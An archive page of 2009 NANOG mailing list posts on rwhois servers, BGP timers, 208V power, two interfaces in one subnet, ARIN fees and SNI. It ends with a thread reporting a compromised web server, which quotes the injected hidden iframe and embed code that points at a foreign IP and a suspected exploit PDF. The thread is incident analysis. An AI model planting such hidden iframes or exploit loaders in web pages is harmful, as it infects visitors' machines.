Hopefully someone knows of an easier solution or at least a tutorial  
somewhere?


--
Jeffrey Lyon, Leadership Team
jeffrey.l...@blacklotus.net | http://www.blacklotus.net
Black Lotus Communications of The IRC Company, Inc.

Look for us at HostingCon 2009 in Washington, DC on August 10th - 12th
at Booth #401.






Re: Rwhoisd solution?

2009-06-10 Thread Chris Stone
 Can someone please point me in the direction of an rwhoisd solution to
 be run on a CentOS Linux platform? ARIN is now punting rwhois queries
 to us and frankly i've been unable to find an easy to install/use
 solution to answer these queries. I've seen the rwhoisd at
 projects.arin.net but the documentation on it is ghastly to say the
 least.

If you use IPPlan to manage your IP allocations, it comes with a whois
daemon that'll automagically use the information from your IPPlan sql
database.


Chris



Re: ICSI Netalyzr launch

2009-06-10 Thread Chris Grundemann
On Tue, Jun 9, 2009 at 16:51, v...@ee.lbl.gov wrote:
 Folks, you might be interested in checking out a network monitoring
 tool we launched today, Netalyzr.  It's a Java applet you can run by
 surfing to netalyzr.com.  It aims to measure a bunch of the properties of
 an end user's network access, particularly looking for transparent
 modifications (e.g., hidden proxies), connectivity restrictions, and some
 security issues (e.g., whether the DNS resolver is vulnerable to the
 Kaminsky attack).

 We've had several thousand users run it today so far, so you may be hearing
 about reports your customers have gotten from it.  You can see a sample
 report at:

        http://netalyzr.icsi.berkeley.edu/restore/id=example-session

 - Vern




Why no privacy policy?  Or am I just partially blind?  Is an answer in
a FAQ legally binding?
~Chris


-- 
Chris Grundemann
weblog.chrisgrundemann.com
www.twitter.com/chrisgrundemann
www.coisoc.org



Re: Multi site BGP Routing design

2009-06-05 Thread Chris Adams
Once upon a time, Steve Bertrand st...@ibctech.ca said:
 Unless someone else has any better advice (I'm sure they do), you will
 need two separate public ASNs. Site 1 advertises its space out of AS1,
 and site 2 advertises its space from AS2.

I don't know that it's better advice, but another way to link the two
sites is via a tunnel (GRE or IPIP).  Use the upstream IP on each router
as the local endpoint, and then run some routing protocol over the
tunnel.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Fiber cut - response in seconds?

2009-06-02 Thread Chris Adams
Once upon a time, Deepak Jain dee...@ai.net said:
 Which is why, if you have a satellite, you often position DIRECTLY
 over the antenna you are sending to

Unless your target is on the equator, you don't position a satellite
directly over anything.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Fiber cut - response in seconds?

2009-06-02 Thread Chris Adams
Once upon a time, Deepak Jain dee...@ai.net said:
 I promise you that that is not the case for all applications.
 Geosynchronous satellites can be anywhere. For the applications you
 are considering (communications mostly), equatorial orbit is the most
 advantageous. 

Geosynchronous are only over a particular longitude.  They move up and
down in latitude, so it isn't over a given point except twice per day
(or only once at the extremes).

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: In a bit of bind...

2009-06-01 Thread Chris Meidinger

On 01.06.2009, at 12:59, Ben Matthew wrote:

Finally I've managed to successfully configure BIND 9 as a slave to  
a myDNS server and the AXFR transfers seem to be working fine.  This  
strikes me as being quite a nice balance of ease of use and  
reliability in case myDNS fails on me.  Ok I appreciate it doesn't  
get around security concerns but hey ho.


As far as security, why have myDNS world-reachable at all? You can  
have bind feed off of myDNS without having anyone on the outside ever  
talk to the myDNS backend.


Chris



Re: Packet loss statistics

2009-05-28 Thread Chris Robb
The Internet2 network publishes 10-second data for all interfaces on  
both its backbone network and the individual racklans in each of its  
cities:


Backbone:
http://dc-snmp.grnoc.iu.edu/i2net/

Racklans:
http://dc-snmp.grnoc.iu.edu/i2net-hp/

Default graphs don't show errors. You need to create a custom graph  
and click the appropriate checkbox. If you want to view a large number  
of interfaces with their errors on a single page, you can create a  
Custom View that includes errors for any number of selected interfaces.


-Chris

On May 28, 2009, at 12:03 PM, Ric Messier wrote:



Is anyone aware of useful resources for packet loss over large LANs  
and WANs? Google turned up a nice statistics page for Qwest's  
network but not much else that seems useful to me.


Our testing teams are trying to simulate expected network conditions  
and rather than go overboard, having something close to real-world  
parameters would be nice.


Thanks!
Ric



Chris Robb, Internet2 Manager of Operations
O: 812.855.8604  C: 812.345.3188

ESCC/Internet2 Joint Techs
July 19-23, 2009 - Indianapolis, Indiana
http://jointtechs.es.net/indiana2009/



Re: Why choose 120 volts?

2009-05-26 Thread Chris Adams
Once upon a time, Joe Greco jgr...@ns.sol.net said:
 And I don't like not having anywhere to plug in my power screwdriver's
 recharger...  I suppose I should see if I can find someplace that has
 a transformer of an appropriate size, or does anyone already have the
 part number for something that can provide a few hundred milliamps of
 120V from 208?  :-)

Isn't 208V usually provided as a connection across two phases of a 3
phase circuit?  In that case, you get 120V by going between one phase
and neutral (no transformer required).

You need a NEMA 14 (4 wire) connector to get two phases, neutral, and
ground (provides 1 208V circuit and/or 2 120V circuits) or a NEMA L21
(5 wire) connector to get all three phases, neutral, and ground
(provides 3 208V circuits and/or 3 120V circuits).

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



IXP BGP timers (was: Multi-homed clients and BGP timers)

2009-05-25 Thread Chris Caputo
What's the BCP for BGP timers at exchange points?

I imagine if everyone did something low like 5-15 rather than the default 
60-180, CPU usage increase could be significant given a high number of peers.

Keeping in mind that bgp fast-external-failover is of no use at an 
exchange since the fabric is likely to stay up when a peer has gone down, 
and BFD would need to be negotiated peer-by-peer, is there a 
recommendation other than the default 60-180?

Would going below 60-180 without first discussing it with your peers, tend 
to piss them off?

Chris



Re: QWEST outage in the Southeast

2009-05-22 Thread Chris Adams
Once upon a time, Bobby Kuzma bku...@electronerdz.com said:
 Does anybody have any information on this? I've had 4 customers on Qwest for 
 Internet connectivity in Florida drop off the net within a few minutes of 
 each other.

I have Qwest via Atlanta and I'm not seeing any issues.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



two interfaces one subnet

2009-05-11 Thread Chris Meidinger

Hi,

This is a pretty moronic question, but I've been searching RFC's on-and-off
for a couple of weeks and can't find an answer. So I'm hoping
someone here will know it offhand.


I've been looking through RFC's trying to find a clear statement that
having two interfaces in the same subnet does not work, but can't find
that statement anywhere.


The OS in this case is Linux. I know it can be done with clever  
routing and prioritization and such, but this has to do with vanilla  
config, just setting up two interfaces in one network.


I would be grateful for a pointer to such an RFC statement, assuming  
it exists.


Thanks!

Chris



Re: two interfaces one subnet

2009-05-11 Thread Chris Meidinger

On 11.05.2009, at 22:34, Patrick W. Gilmore wrote:


On May 11, 2009, at 4:29 PM, Chris Meidinger wrote:

I would be grateful for a pointer to such an RFC statement,  
assuming it exists.


Why would an RFC prohibit this?

Most _implementations_ do, but as far as network rules in general  
it is a valid configuration.


That was essentially my conclusion as well: logically it can't work,  
but I wasn't certain where it might be forbidden.


Thusly did I come to NANOG with the question, thinking smarter people  
than I might know. If it's completely down to implementation, or  
really to the interaction between TCP and underlying IP, then so be  
it. I was hoping that I might just not have thought of the right place  
to look.


On 11.05.2009, at 22:39, Mikael Abrahamsson wrote:


On Mon, 11 May 2009, Chris Meidinger wrote:

I've been looking through RFC's trying to find a clear statement
that having two interfaces in the same subnet does not work, but
can't find that statement anywhere.


I don't know if it still works, but it did in Linux little over 10  
years back. Proxy-arp:ed all the IPs in the /27 in the /24 and  
everything was fine (legacy reasons plus radiolink which I didn't  
want to run a lot of broadcasts over). There are legitimate cases  
where you might want to do this.


Yes, I've gotten it to work as well as little as 10 days ago, but it's  
not something that $random_customer should be doing as a matter of  
practice.


Thus, again, my hope that I just wasn't thinking of the right place to  
look to find an IETF recommendation against doing so.


Thanks for the input!

Chris



Re: two interfaces one subnet

2009-05-11 Thread Chris Meidinger

On 11.05.2009, at 23:00, Charles Wyble wrote:


What does two interfaces in one subnet mean?

Two NICs? Or virtual interfaces?


Two NICs, as in physical interfaces.



Re: two interfaces one subnet

2009-05-11 Thread Chris Meidinger

On 11.05.2009, at 23:19, Alex H. Ryu wrote:

Unless you configure Layer 2 for two interfaces, it's not going to work.

It is invalid from networking principle.
If you have to send the traffic for host in same subnet you configured,
which interface it should send out ?
Basically it may create broadcast storm loop by putting two ip addresses
in same subnet in different interface.
It may be allowed from host-level, but from router equipment, I don't
think it was allowed at all.


Alex, I _personally_ know that it's a problem. I was hoping for an
RFC-reference, or similar standards document, to show to customers to
convince them to stop trying to hack things to make it work.


Chris



Re: two interfaces one subnet

2009-05-11 Thread Chris Meidinger

On 11.05.2009, at 23:31, Dan White wrote:


Chris Meidinger wrote:

Hi,

This is a pretty moronic question, but I've been searching RFC's
on-and-off for a couple of weeks and can't find an answer. So I'm
hoping someone here will know it offhand.
I've been looking through RFC's trying to find a clear statement
that having two interfaces in the same subnet does not work, but
can't find that statement anywhere.
The OS in this case is Linux. I know it can be done with clever  
routing and prioritization and such, but this has to do with  
vanilla config, just setting up two interfaces in one network.
I would be grateful for a pointer to such an RFC statement,  
assuming it exists.


If your goal is to achieve redundancy or to increase bandwidth, you  
can bond the interfaces together - assuming that you have a switch /  
switch stack that supports 802.3ad.


Then you could assign multiple IPs to the bonded interface without
any layer 3 messiness.


I should have been clearer. The case in point is having two physical  
interfaces, each with a unique IP, in the same subnet.


For example, eth0 is 10.0.0.1/24 and eth1 is 10.0.0.2/24, nothing like  
bonding going on. The customers usually have the idea of running one  
interface for administration and another for production (which is a  
_good_ idea) but they want to do it in the same subnet (not such a  
good idea...)


Chris



Re: two interfaces one subnet

2009-05-11 Thread Chris Meidinger

On 11.05.2009, at 23:42, Kevin Oberman wrote:


Date: Mon, 11 May 2009 16:19:56 -0500
From: Alex H. Ryu r.hyuns...@ieee.org

Unless you configure Layer 2 for two interfaces, it's not going to work.

It is invalid from networking principle.
If you have to send the traffic for host in same subnet you configured,
which interface it should send out ?
Basically it may create broadcast storm loop by putting two ip addresses
in same subnet in different interface.
It may be allowed from host-level, but from router equipment, I don't
think it was allowed at all.

Alex



I am a bit baffled as to why people think:
1. It won't work
2. It is a bad thing to do if it would work

Neither is true. If it is two separate interfaces with two MAC
addresses, it will work fine IF one of the interfaces is configured with
a netmask of 255.255.255.255 (/32). Of course, you will have to add
routes for the second interface if you expect to source traffic from it,
but it really is not rare.


This is, of course, how I've done it at times in the past. Routing  
management can, however, become quite a pain over time.


The customer expectation is, naturally, that any traffic related to a  
connection that comes in to the first interface should go back out  
that interface, and anything related to a connection that came into  
the second interface should go back out there. (All this without any  
specific routing etc.)


I think we both know that that's not going to happen automagically.

Chris
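
The behaviour discussed in this thread, as an added example that is not part of any poster's message: a small Python model of Linux route selection showing why replies sourced from eth1's address leave via eth0 in a vanilla config, and how per-source policy rules change that. The gateway 10.0.0.254, the peers 192.0.2.50 and 10.0.0.77, the table names, and the tie-break (the route installed first wins between equal prefixes) are assumptions of the model.

```python
import ipaddress
from collections import namedtuple

Route = namedtuple("Route", "prefix dev via")
Rule = namedtuple("Rule", "prio src table")   # src=None means "from all"


def route(prefix, dev, via=None):
    return Route(ipaddress.ip_network(prefix), dev, via)


def lookup(table, dst):
    """Longest-prefix match on the destination only.
    Model assumption: between equal prefixes the first-installed route wins."""
    dst = ipaddress.ip_address(dst)
    best = None
    for r in table:
        if dst in r.prefix and (best is None or r.prefix.prefixlen > best.prefix.prefixlen):
            best = r
    return best


def egress(src, dst, rules, tables):
    """Walk the policy rules in priority order, as the kernel does, and
    return the outgoing device for a packet with this source and destination."""
    src = ipaddress.ip_address(src)
    for rule in sorted(rules, key=lambda r: r.prio):
        if rule.src is not None and src not in ipaddress.ip_network(rule.src):
            continue
        hit = lookup(tables[rule.table], dst)
        if hit is not None:
            return hit.dev
    return None


# Host from the thread: eth0 = 10.0.0.1/24, eth1 = 10.0.0.2/24.
TABLES = {
    # What a vanilla config produces: two connected routes, one default.
    "main": [
        route("10.0.0.0/24", "eth0"),
        route("10.0.0.0/24", "eth1"),
        route("0.0.0.0/0", "eth0", via="10.0.0.254"),
    ],
    # Per-interface tables, equivalent to:
    #   ip route add 10.0.0.0/24 dev eth1 src 10.0.0.2 table 102
    #   ip route add default via 10.0.0.254 dev eth1 table 102
    "t_eth0": [route("10.0.0.0/24", "eth0"), route("0.0.0.0/0", "eth0", via="10.0.0.254")],
    "t_eth1": [route("10.0.0.0/24", "eth1"), route("0.0.0.0/0", "eth1", via="10.0.0.254")],
}

VANILLA_RULES = [Rule(32766, None, "main")]
# Equivalent to: ip rule add from 10.0.0.2 lookup 102   (and likewise for eth0)
POLICY_RULES = [
    Rule(100, "10.0.0.1", "t_eth0"),
    Rule(101, "10.0.0.2", "t_eth1"),
    Rule(32766, None, "main"),
]


def reply_paths(rules):
    """Device used for replies from each local address to an off-link and an on-link peer."""
    peers = ("192.0.2.50", "10.0.0.77")      # constructed sample peers
    return {(local, peer): egress(local, peer, rules, TABLES)
            for local in ("10.0.0.1", "10.0.0.2") for peer in peers}


if __name__ == "__main__":
    for name, rules in (("vanilla", VANILLA_RULES), ("policy", POLICY_RULES)):
        for (local, peer), dev in reply_paths(rules).items():
            print(f"{name:8} reply {local} -> {peer} leaves via {dev}")
```

In the vanilla case every reply, including those for connections that arrived on eth1, leaves through eth0, which is why a separate administration interface in the same subnet does not isolate anything until the per-source rules are added.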



Re: Why is www.google.cat resolving?

2009-05-05 Thread Chris Meidinger

On 05.05.2009, at 09:33, Seth Mattinen wrote:


Tim Tuppence wrote:

Hello,

I am seeing that www.google.cat resolves from three different  
networks.

It even resolves from here: http://www.squish.net/dnscheck/

What is going on?



Why are you expecting it not to?


I think the real question here is why does schroedingers.cat not
resolve, and who will be the first person able to jump through the
requisite hoops to make it do so.




Re: ground control to TWTelecom

2009-05-04 Thread Chris Grundemann
On Mon, May 4, 2009 at 11:57, Jon Lewis jle...@lewis.org wrote:
 Seems like we were just here, but yet again, I'm having trouble verifying
 you're accepting a customer route (a different one than last week), and
 since sending me a copy of our prefix filter was apparently too much to ask,
 and you make it so easy to talk on the phone with anyone who knows what BGP
 is, here we are.  Perhaps I'll track down our sales person and chew their
 ear.

 --
  Jon Lewis                   |  I route
  Senior Network Engineer     |  therefore you are
  Atlantic Net                |
 _ http://www.lewis.org/~jlewis/pgp for PGP public key_




I assume you checked route-server.twtelecom.net for the route?



-- 
Chris Grundemann
weblog.chrisgrundemann.com



Intel wants to hook 15 billion embedded devices to the Internet in 6 years

2009-05-04 Thread Chris Boyd

Oddly, none of the courses in the event discuss IPv6.

http://www.intelembeddedevent.com/

Intel® Embedded eVent We’re standing at the forefront of the Embedded  
Internet Era. The opportunities are yours.
The networked world is growing at a tremendous pace. In just six  
years, it’s expected that 15 Billion intelligent devices will be  
connected to the internet. And, with your imagination and hard work,  
Intel can be a part of many of the devices that will revolutionize the  
way we work, talk, play and move.
So, Intel is hosting our first virtual tradeshow, the Intel Embedded  
eVent, and we want you to join us! It’s a one day event that will  
showcase Intel technologies and our customers’ innovation in  
intelligent, connected devices.


Re: [quagga-users 10587] bgpd crash - apologies (fwd)

2009-05-03 Thread Chris Caputo
On Mon, 4 May 2009, Ingo Flaschberger wrote:
 -- Forwarded message --
 Date: Mon, 04 May 2009 00:38:54 +0300
 From: Geert Jan de Groot geertjan.degr...@xs4all.nl
 To: quagga-us...@lists.quagga.net
 Subject: [quagga-users 10587]  bgpd crash - apologies
 
 Hello,
 
 I learned today that a BGP announcement for which I am the tech-c,
 is causing difficulties with Quagga. First of all, I apologise;
 it's only today that I heard about these difficulties.
[...]

A fix is here:

 https://www.caputo.com/foss/quagga-0.99.10-BGP-4-byte-ASN-bug-fixes.patch
 https://www.caputo.com/foss/quagga-0.99.11-BGP-4-byte-ASN-bug-fixes.patch

 (the patches are identical.  naming is just for clarity.)

Chris



Re: 10-GigE for servers

2009-05-01 Thread Chris Adams
Once upon a time, Alex Thurlow a...@blastro.com said:
 As long as it's not a single connection that you're looking to get over 
 1Gb, etherchannel should actually work.  It uses a hash based on (I 
 believe) source and destination IP and port, so it should roughly 
 balance connections between the servers.

That depends on the devices on each end.  For example, some switches can
only hash on MAC addresses, some can look at IPs, and some can look at
ports.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Important New Requirement for IPv4 Requests [re impacting revenue]

2009-04-23 Thread Chris Grundemann
Apologies for a somewhat latent response - I was attending an IPv6
Seminar (of which ARIN was a sponsor) the last two days and am just
getting to nanog mail today.

On Tue, Apr 21, 2009 at 15:42, Shane Ronan sro...@fattoc.com wrote:
 I'm not sure if anyone agrees with me, but these responses seem like a big
 cop out to me.

 A) If ARIN is so concerned about the potential depletion of v4 resources,
 they should be taking a more proactive roll in proposing potential solutions
 and start conversation rather then saying that the users should come up with
 a proposal which they then get a big vote one.

They is YOU.  ARIN policy is created by the community - Your voice,
your community.  The statement should read: If [you] are so concerned
about the potential depletion of v4 resources, [you] should be taking
a more proactive [role] in proposing potential solutions and
start[ing] conversation.

If you participated in the ARIN PDP (1), even by just lurking on the
ppml (2), you would already be aware that many folks have proposed
many potential solutions (some of which have already been adopted) and
that there _is_ an ongoing conversation that I strongly encourage you
to join.

 B) Again, while it might be the IETF's job, shouldn't the group trusted
 with the management of the IP space at least have a public opinion about
 these solutions are designed. Ensuring that they are designed is such a way
 to guarantee maximum adoption of v6 and thus reducing the potential for
 depletion of v4 space.

I think that developing resource management policy to meet those goals
is much more in line with ARIN's mandate.  As I mentioned above, this
is happening.

 C) Are ARIN's books open for public inspection? If so, it might be
 interesting for the group to see where all our money is going, since it's
 obviously not going to outreach and solution planning. Perhaps it is being
 spent in a reasonable manner, and the fees are where they need to be to
 sustain the organizations reasonable operations, but perhaps not.

Links to annual statements etc. have already been provided.  I am sure
an email to ARIN (3) would help you answer your question further.

 Mr Curran, given the response you've seen from the group, and in particular
 the argument that most CEO's or Officers of firms will simply sign off on
 what they IT staff tells them (as they have little to no understanding of
 the situation), can you explain what exactly you are hoping to achieve by
 heaping on yet an additional requirement to the already over burdensome
 process of receiving an IPv4 allocation?

I obviously can not speak for Mr. Curran, but I do applaud this
effort.  I believe that adding this requirement will lower
exaggeration and fraud as well as raise awareness.  These are both
noble goals and well worth the marginal effort required.  The argument
that most officers will sign anything put in front of them is not very
convincing to me.  I have a hard time accepting incompetence or
laziness as a valid rationale for any argument at all really.

~Chris (speaking for myself)

(1) - https://www.arin.net/knowledge/pdp/
(2) - https://www.arin.net/participate/mailing_lists/index.html
(3) - mailto:i...@arin.net



 Shane Ronan

 --Opinions contained herein are strictly my own--



 On Apr 21, 2009, at 9:01 AM, John Curran wrote:

 Roger -

   A few nits:

   A) ARIN's not ignoring unneeded legacy allocations, but can't take
      action without the Internet community first making some policy
      on what action should be taken...  Please get together with folks
      of similar mind either via PPML or via Public Policy meeting at
       the Open Policy Bof, and then propose a policy accordingly.

   B) Technical standards for NAT  NAPT are the IETF's job, not ARIN's.

   C) We've routinely lowered fees since inception, not raised them.

 Thanks,
 /John

 John Curran
 Acting CEO
 ARIN






-- 
Chris Grundemann
weblog.chrisgrundemann.com



Re: Important New Requirement for IPv4 Requests

2009-04-21 Thread Chris Owen


On Apr 21, 2009, at 5:49 AM, Frank Bulk - iName.com wrote:

It appears that ARIN wants to raise the IP addressing space issue to the CxO
level -- if it was interested in honesty, ARIN would have required a
notarized statement by the person submitting the request.  If ARIN really
wants to get the interest of CEOs, raise the price!



And punish those that do play by the rules?  ARIN's prices are already  
crazy high for what they actually do.


Chris

- --
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
- --








Re: Important New Requirement for IPv4 Requests [re impacting revenue]

2009-04-21 Thread Chris Owen


On Apr 21, 2009, at 11:01 AM, John Curran wrote:


   C) We've routinely lowered fees since inception, not raised them.



Well I'm not sure what your definition of routinely is, but we've
not seen a decrease in our fees any time in the past 8 years.


Chris

- --
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
- --








Re: Important New Requirement for IPv4 Requests [re impacting revenue]

2009-04-21 Thread Chris Owen


On Apr 21, 2009, at 4:42 PM, Shane Ronan wrote:

C) Are ARIN's books open for public inspection? If so, it might be  
interesting for the group to see where all our money is going, since  
it's obviously not going to outreach and solution planning. Perhaps  
it is being spent in a reasonable manner, and the fees are where  
they need to be to sustain the organizations reasonable operations,  
but perhaps not.



It is a little out of date and not terribly detailed but they did post  
the 2008 budget at:


https://www.arin.net/about_us/corp_docs/budget.html

Budget is just over 13M.  About 1/2 of that is salaries/benefits  
(maybe more if you add in 'legal fees').


A couple of interesting notes when looking at it:

12+M divided by the 3300 members is just shy of $4,000 per customer.

Payroll is $5,707,134 for 47 full time employees.  That is an average  
salary of $121,428 across all employees.


Internet Research and Support is $164,500

Travel (which includes travel for board members, etc) is $1,315,349.

There is more detail but older data at:

https://www.arin.net/about_us/corp_docs/annual/2007_audited_financials.pdf

Chris

- --
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
- --








Re: Important New Requirement for IPv4 Requests

2009-04-21 Thread Chris Adams
Once upon a time, Jo Rhett jrh...@netconsonance.com said:
 Since  
 virtual web hosting has no technical justification for IP space, I  
 refuse it.

SSL and FTP are technical justifications for an IP per site.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Important New Requirement for IPv4 Requests

2009-04-21 Thread Chris Adams
Once upon a time, Ricky Beam jfb...@gmail.com said:
 On Tue, 21 Apr 2009 18:40:30 -0400, Chris Adams cmad...@hiwaay.net wrote:
 SSL and FTP are technical justifications for an IP per site.
 
 No they aren't.  SSL will work just fine as a name-based virtual host with  
 any modern webserver / browser. (Server Name Indication (SNI) [RFC3546,  
 sec 3.1])

What is your definition of modern?

According to Wikipedia http://en.wikipedia.org/wiki/Server_Name_Indication:

  Unsupported Operating Systems and Browsers

  The following combinations do not support SNI.

* Windows XP and Internet Explorer 6 or 7
* Konqueror/KDE in any version
* Apache with mod_ssl: there is a patch under review by httpd team
  for inclusion in future releases, after 2.2.11.  See doco at [1]
* Microsoft Internet Information Server IIS (As of 2007).

Seeing as WinXP/IE is still the most common combination, SNI is a long
time away from being useful.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Chris Owen


On Apr 20, 2009, at 9:04 PM, David Andersen wrote:

Just a thought:  A technical person might be very happy to lie to a  
toothless organization that holds no real sway over him or her,  
won't revoke the address space once granted, and for whom the  
benefit of lots of address space in which to play exceeds any  
potential pain from being caught, er, exaggerating their need for  
address space.


That same technical person might be less inclined to lie to a  
director of their company who asks:  Are you asking me to attest,  
publicly and perhaps legally, that this information is correct?  If  
you're wrong and you make an ass of me, it's going to be yours that  
goes out the door.


Seems like a reasonable experiment to try, at least.



I agree there is no harm in the idea but as I was reading the  
announcement this morning I couldn't help but think Too little, too  
late.


Chris

- --
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
- --







Re: IXP

2009-04-19 Thread Chris Caputo
On Sun, 19 Apr 2009, Mikael Abrahamsson wrote:
 On Sat, 18 Apr 2009, Nick Hilliard wrote:
  - ruthless and utterly fascist enforcement of one mac address per 
  port, using either L2 ACLs or else mac address counting, with no 
  exceptions for any reason, ever.  This is probably the single most 
  important stability / security enforcement mechanism for any IXP.
 
 Well, as long as it simply drops packets and doesn't shut the port or 
 some other fascist enforcement. We've had AMSIX complain that our 
 Cisco 12k with E5 linecard was spitting out a few tens of packets per 
 day during two months with random source mac addresses. Started 
 suddenly, stopped suddenly. It's ok for them to drop the packets, but 
 not shut the port in a case like that.

From the IX operator perspective it is important to immediately shut down 
a port showing a packet from an extra MAC address, rather than just 
silently dropping them.  The fascist reason being that it is a quick and 
effective way of informing the participant that their recent maintenance 
has gone afoul.  At the SIX we have err-disable recovery set to 5 minutes 
so that the port will come back up automatically.  (sometimes only to be 
shut down again two packets later, and usually before any BGP sessions have 
returned)

If the port is left up with the rogue packets simply being dropped, and 
the exchange sends the participant a followup email informing them of the 
problem, the participant's maintenance window may already have passed 
and so problem resolution tends to get extended.

In cases that are temporarily unfixable, such as a router bug, we have been 
known to change the port config such that the rogue packets are just 
dropped/logged rather than answered with a shutdown, but that is rare.

Chris
SIX Janitor



Re: Malicious code just found on web server

2009-04-17 Thread Chris Mills
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg b...@wins.net wrote:
 FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

 -Original Message-
 From: Russell Berg
 Sent: Friday, April 17, 2009 3:39 PM
 To: 'nanog@nanog.org'
 Subject: Malicious code just found on web server

 We just discovered what we suspect is malicious code appended to all 
 index.html files on our web server as of the 11:00 central time hour today:

 src=http://77.92.158.122/webmail/inc/web/index.php;
 style=display: none; height=0 width=0/iframe iframe 
 src=http://77.92.158.122/webmail/inc/web/index.php;
 style=display: none; height=0 width=0/iframe /body /html

 IP address resolves to mail.yaris.com; couldn't find any A/V site references 
 to this.

 Google search reveals some Chinese sites with references to the URL today, 
 but nothing substantial in the translation.

 Just a heads up for folks; we have a team investigating...

 Russell Berg
 Dir - Product Development
 Airstream Communications
 b...@wins.net
 715-832-3726
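
The injection reported in this message, an invisible iframe pointing at a foreign host and appended to every index.html, is something a web root can be swept for. The following is an added example, not code from the thread: the sample page, the 192.0.2.10 documentation address, the `www.example.org` site name and all function names are constructed for illustration.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

WATCHED = {"iframe", "embed", "object"}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY = re.compile(r"^\s*[01]\s*(px)?\s*$", re.I)   # width/height of 0 or 1

# Constructed sample: one legitimate local iframe, one injected hidden one.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="/news/ticker.html" width="300" height="40"></iframe>
<iframe src="http://192.0.2.10/inc/index.php" style="display: none;" height="0" width="0"></iframe>
</body></html>
"""


def hidden_reasons(attrs):
    """Return the reasons an element would be invisible to a visitor."""
    reasons = []
    if HIDDEN_STYLE.search(attrs.get("style") or ""):
        reasons.append("style hides element")
    for dim in ("width", "height"):
        if TINY.match(attrs.get(dim) or ""):
            reasons.append(f"{dim}={attrs[dim].strip()}")
    return reasons


class _Finder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__(convert_charrefs=True)
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in WATCHED:
            return
        a = dict(attrs)
        src = a.get("src") or a.get("data") or ""
        host = (urlparse(src).hostname or "").lower()
        reasons = hidden_reasons(a)
        # Relative URLs have no host and load from the site itself, so only
        # hidden elements that pull content from another host are reported.
        if reasons and host and host not in self.own_hosts:
            self.findings.append((self.getpos()[0], tag, src, reasons))


def scan_html(text, own_hosts=()):
    """Return (line, tag, src, reasons) for each hidden off-site embed."""
    finder = _Finder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.findings


def scan_tree(root, own_hosts=()):
    """Scan every .html/.htm file under root; map path -> findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read(), own_hosts)
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    for line, tag, src, why in scan_html(SAMPLE, own_hosts={"www.example.org"}):
        print(f"line {line}: hidden <{tag}> -> {src} ({', '.join(why)})")
```

Pass the site's own hostnames in `own_hosts` so that deliberately hidden same-site frames are not reported; comparing the flagged files' modification times then shows whether they were all altered in the same window.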







Re: Malicious code just found on web server

2009-04-17 Thread Chris Mills
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson fergdawgs...@gmail.com wrote:

 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com
 wrote:


 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com
 wrote:

 I took a quick look at the code... formatted it in a pastebin here:
 http://pastebin.com/m7b50be54

 That javascript writes this to the page (URL obscured):
 document.write(embed
 src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
 U nknown|US|1.2.3.4\ width=\0\ height=\0\
 type=\application/pdf\/embed);

 The 1.2.3.4 in the URL is my public IP address (I changed that).

 Below the javascript, it grabs a PDF:
 embed src=include/two.pdf width=1 height=0
 style=border:none/embed

 That PDF is on the site, I haven't looked at it yet though.


 Most likely a file that exploits a well-known vulnerability in Adobe
 Reader, which in turn probably loads malware from yet another location.

 We've been seeing a lot of this lately.


 Yes, definitely malicious:

